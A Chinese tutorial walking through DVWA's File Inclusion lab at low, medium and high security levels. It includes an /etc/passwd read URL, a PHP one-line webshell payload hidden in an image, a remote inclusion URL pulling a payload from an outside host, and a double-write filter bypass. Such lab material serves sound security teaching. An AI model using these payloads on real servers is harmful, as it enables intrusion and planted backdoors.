dvwa File Inclusion(文件包含) 低中高各个级别介绍及破解过程

本地文件包含

File Inclusion，意思是文件包含（漏洞），是指当服务器开启allow_url_include选项时，就可以通过php的某些特性函数（include()，require()和include_once()，require_once()）利用url去动态包含文件，此时如果没有对文件来源进行严格审查，就会导致任意文件读取或者任意命令执行。文件包含漏洞分为本地文件包含漏洞与远程文件包含漏洞，远程文件包含漏洞是因为开启了php配置中的allow_url_fopen选项（选项开启之后，服务器允许包含一个远程的文件）

low

php核心代码

<?php
    $file = $_GET['page']; //The page we wish to display 
?>

服务器端对page参数没有做任何的过滤跟检查

本地文件包含+webshell

http://192.168.0.8/dvwa/vulnerabilities/fi/?page=/etc/passwd 类似

当被包含的文件在服务器本地时候，形成本地包含
1.制作一句话木马 1234.jpg 推荐软件 edjpgcom

<?fputs(fopen("shell.php","w"),'<?php eval($_POST[admin]);?>')?>

2.上传图片木马文件

3.执行文件包含 并产生后门

4.通过菜刀连接

远程文件包含+webshell

服务器上开启aparch 上传一个txt，文件在 http://47.99.168.126/1.txt
内容

fputs(fopen(shell.php,w),'php eval($_POST[admin]);')

然后在dvwa后面加上这个路径，执行一下即可
http://192.168.0.8/dvwa/vulnerabilities/fi/?page=http://47.99.168.126/1.txt

medium

php核心代码

<?php
    $file = $_GET['page']; // The page we wish to display 
    // Bad input validation
    $file = str_replace("http://", "", $file);
    $file = str_replace("https://", "", $file);        
?>

Medium级别的代码增加了str_replace函数，对page参数进行了一定的处理，将”http:// ”、”https://”替换为空字符，即删除
使用str_replace函数是极其不安全的，因为可以使用双写绕过替换规则
1.本地文件包含
不受影响
2.远程文件包含 双写http://绕过
http://192.168.0.8/dvwa/vulnerabilities/fi/?page=hthttp:// tp://47.99.168.126/1.txt

high

php核心代码

<?php    
    $file = $_GET['page']; //The page we wish to display 
    // Only allow include.php
    if ( $file != "include.php" ) {
        echo "ERROR: File not found!";
        exit;
    }   
?>

high级别的代码使用了白名单机制进行防护，简单粗暴，page参数必须为“include.php”，彻底杜绝了文件包含漏洞。